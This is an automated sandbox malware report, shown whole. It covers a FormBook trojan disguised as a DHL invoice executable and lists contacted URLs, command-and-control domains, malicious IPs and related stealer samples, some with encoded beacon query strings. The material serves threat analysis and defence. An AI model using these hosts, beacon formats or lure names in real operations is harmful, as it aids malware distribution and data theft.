http://www.yassa-hany.onlineReferer:	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rdlva.comReferer:	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.itkagear.com/pz08/www.jenstandsforarkansas.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.itkagear.com/pz08/	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.microsoft.c	explorer.exe, 00000006.00000003.2284484234.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077349116.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3891064279.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.0000000009237000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000000.00000002.1467009069.0000000002A23000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jenstandsforarkansas.com/pz08/	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSd	explorer.exe, 00000006.00000003.2809145354.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285909149.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1487556831.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.bigtexture.xyz	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.quickfibrokers.com/pz08/	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.bigtexture.xyz/pz08/www.baerana.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.quickfibrokers.comReferer:	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.usetruerreview.com/pz08/	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
https://outlook.com	explorer.exe, 00000006.00000000.1487556831.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.papermoonnursery.comReferer:	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.baerana.comReferer:	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.phdop.xyz	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.aloyoga-uae.comReferer:	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000006.00000003.2809145354.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285909149.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1487556831.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ae-skinlab.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.papermoonnursery.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000006.00000003.2809145354.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285909149.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1487556831.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.anti-theft-device-82641.bond/pz08/	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.bigtexture.xyz/pz08/	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.c2help.live/pz08/	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.yassa-hany.online	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000006.00000002.3890474944.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.papermoonnursery.com/pz08/	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.yassa-hany.online/pz08/www.taxibactrungnam.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.itkagear.comReferer:	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rdlva.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://img.sedoparking.com	explorer.exe, 00000006.00000002.3901744709.0000000010E5F000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000007.00000002.3885851208.00000000056BF000.00000004.10000000.00040000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.jenstandsforarkansas.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.permanentday.space/pz08/www.usetruerreview.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 00000006.00000002.3889073866.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1473566211.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1479452391.0000000007710000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
https://wns.windows.com/EM0	explorer.exe, 00000006.00000003.2285909149.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2809145354.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1487556831.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.quickfibrokers.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.taxibactrungnam.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.bigtexture.xyzReferer:	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.quickfibrokers.com/pz08/www.permanentday.space	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.usetruerreview.comReferer:	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.permanentday.space/pz08/	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.usetruerreview.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.taxibactrungnam.com/pz08/	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ae-skinlab.comReferer:	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jenstandsforarkansas.com/pz08/www.aloyoga-uae.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rdlva.com/pz08/www.ae-skinlab.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.usetruerreview.com/pz08/www.bigtexture.xyz	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.c2help.live/pz08/www.papermoonnursery.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.phdop.xyzReferer:	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ns.adobeS	explorer.exe, 00000006.00000000.1476006897.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3886674045.0000000004405000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.anti-theft-device-82641.bond	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.c2help.live	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.sedo.com/services/parking.php3	explorer.exe, 00000006.00000002.3901744709.0000000010E5F000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000007.00000002.3885851208.00000000056BF000.00000004.10000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.117	www.baerana.com	Germany	47846	SEDO-ASDE	true
103.224.212.213	www.yassa-hany.online	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
15.197.142.173	quickfibrokers.com	United States	7430	TANDEMUS	true
103.167.199.20	taxibactrungnam.com	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
34.149.87.45	td-ccm-neg-87-45.wixdns.net	United States	2686	ATGS-MMD-ASUS	true
3.33.130.190	rdlva.com	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1396156
Start date and time:	2024-02-21 14:33:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DHL Factura Electronica Pendiente documento No 04BB25083.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@11/6@10/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 139 Number of non-executed functions: 291
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:34:07	API Interceptor	1x Sleep call for process: DHL Factura Electronica Pendiente documento No 04BB25083.exe modified
14:34:13	API Interceptor	13x Sleep call for process: powershell.exe modified
14:34:20	API Interceptor	7361891x Sleep call for process: explorer.exe modified
14:35:00	API Interceptor	7144066x Sleep call for process: systray.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.117	DHL Express_5047270226.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.artcitytheatre.com/3a3w/
	DHL Receipt_2048094227.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.artcitytheatre.com/nk2s/
	rN__089734.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.artcitytheatre.com/v3ka/
	Modiolus.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.foundationtest.site/m9so/
	FedEx_AWB#53053752046.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.artcitytheatre.com/nk2s/
	DHL_AWB# 5047292261.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.artcitytheatre.com/3a3w/
	EJ9wbX3RFyX19aq.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.boatnirvanalife.com/cz30/
	DHL_AWB# 5047232261.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.artcitytheatre.com/3a3w/
	rBancofiecompro.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.grammarhome.com/pz08/?rDKp5F=+6acTchy+21dSWg2OiyP/FObd5J3Ivex+uKPSgZBZTtt/Ockf0QycLcZZIKIlef0Nr1J&pPf=kDK0IBv8Nx6
	Supplier Compliance Purchase order PO 2135850 QTNIU81408875 20240215.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.grammarhome.com/pz08/?00Gxhfs=+6acTcgG+WwtPm9CSSyP/FObd5J3Ivex+uKPSgZBZTtt/Ockf0QycLcZZLqy1P/MXMUO&EjP=0R-HePyHyFdHq6RP
103.224.212.213	PaDQmSw2ud.dll	Get hash	malicious	Laplas Clipper	Browse	searchseedphase.online/bot/regex
	PaDQmSw2ud.dll	Get hash	malicious	Laplas Clipper	Browse	searchseedphase.online/bot/regex
	Documento de confirmacion de orden de compra OC 1580070060.exe	Get hash	malicious	FormBook	Browse	www.yassa-hany.online/pz08/?mzrPV4R=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVpBqNDhq+c&Rl=8pFP0r98Chvt5p5P
	2024-09C33T37.exe	Get hash	malicious	FormBook	Browse	www.jeffwertdesign.com/ve92/?K2M8bVC=FFlo4/TKNXAR7V12oAudCGusg/tK2zFE/4uuQQ9Wgy0sGP4AKi+QV1PLyZgh2gAJGU7I&tXC=BDK02VJ87dHtUzo
	rBCPcomprobante.exe	Get hash	malicious	FormBook	Browse	www.yassa-hany.online/pz08/?CrFT7j=ftx8Clc09Ned3F&pR-l7PfH=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVQNLhAw6fb
	Proforma_Invoice.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.epansion.com/ao65/?BR-hMX=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+a5ltJSnpB6j&Gzu=sFNxH
	003425425124526.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.epansion.com/ao65/?GR0=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+atqjoikrWmu&IDK=RJBh5RS0IZO8zhrP
	Nuevo_orden_pdf.exe	Get hash	malicious	FormBook	Browse	www.themicheline.com/g11y/?4hOl=Q/yQLYVAGKkMZrnE0iOJNdDJIeKID0+EwORul+wPjaygN5L5fjaaMR6aEX0pRQDKm1/B&l2Mt_N=fTAlQTwhPDH
	Hubnnuiisapctu.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.epansion.com/ao65/?2d=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+ZVDqIufkgb4a3XCnQ==&3fC=vZeTzRlX84SHE
15.197.142.173	MCYq2AqNU0.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig	Browse	veselcontractors.com/pma/
	rEncomendarPDF.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.magiccarpet-ride.com/ge22/?GxoX=5+uINVVgHWl4OpIYki5JTJ8/JA9Xhhy7bPh3OZNS8e32NQo31PLkDzGWAjp7srORSYYgrbq6bw==&xVZpGL=6l3Df6RXzhnPD
	O4FR7BTmYq.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.soundmoneymiles.com/cg86/
	qUGJZ4Ih2v.exe	Get hash	malicious	FormBook	Browse	www.tryscriptify.com/gy14/?Ylg8g4Ap=4JZiO/K9dKDZpUKGlDNe0/6pZOUW7vCSruOjW8aGne4X7Ok9IXpluEcnNjb2dUCVfwxE&Thct=Dxlpdbhpx
	0jwySdaiGH.exe	Get hash	malicious	FormBook	Browse	www.sendmeyourlink.com/g22y/?Ezut_=Qp/acSwkm5UwGz1M5ACYSDsWfOLyWpz+tctpPAdi++DWJOe8IseGDtcwc3XKDESsIHVq&mVuXCF=TxodfFN
	a5hbkmGD7N.exe	Get hash	malicious	Pushdo	Browse	touchfam.ca/
	SOLICITUD DE OFERTA.exe	Get hash	malicious	FormBook	Browse	www.chardonhouston.com/hi5f/?EPTX=1bGTxft0Kt5p-r4P&3fqLR=tGV7qkOfV0t3pqW61CwlYZmd6apjnAA0FtfCKbfjJNKCK3BUuQ0c0TkkRmHOwwQ9zYw1
	qZSULDXKfu.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.patrickgtduo.com/c10s/?8pgX=gmubv2MwMOW0+YRyePFZeJBj7QgVjrif9PwQoQ3VJQP7WQz4VpOWtEAcgJWo1qowyTWI&9rkHLJ=oDKX3Rw
	rSPAREPARTSLISTS.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.tryxcherry.com/cs10/?BTEdKzi=hMO0y5RjTieeesvNa3wBGwMpUHhma+bf8GU5MOmLpJokCV7hv561AC0GSBaqD0Su6C44&dZ=AlDXE
	Confirm!!!!.exe	Get hash	malicious	FormBook	Browse	www.emsculptcenterofne.com/he2a/?1bzTez0=nhNBuRkoNWOxJDiZ227X18Db1Kxbenb5b3vHQO2tFDH+XtD98Je8GVRwkFt4VPItbiYu&oH54=VT8lsXUPYHpTbNI

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
td-ccm-neg-87-45.wixdns.net	SKM-56376258566FG.vbs	Get hash	malicious	FormBook, GuLoader	Browse	34.149.87.45
	MCYq2AqNU0.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig	Browse	34.149.87.45
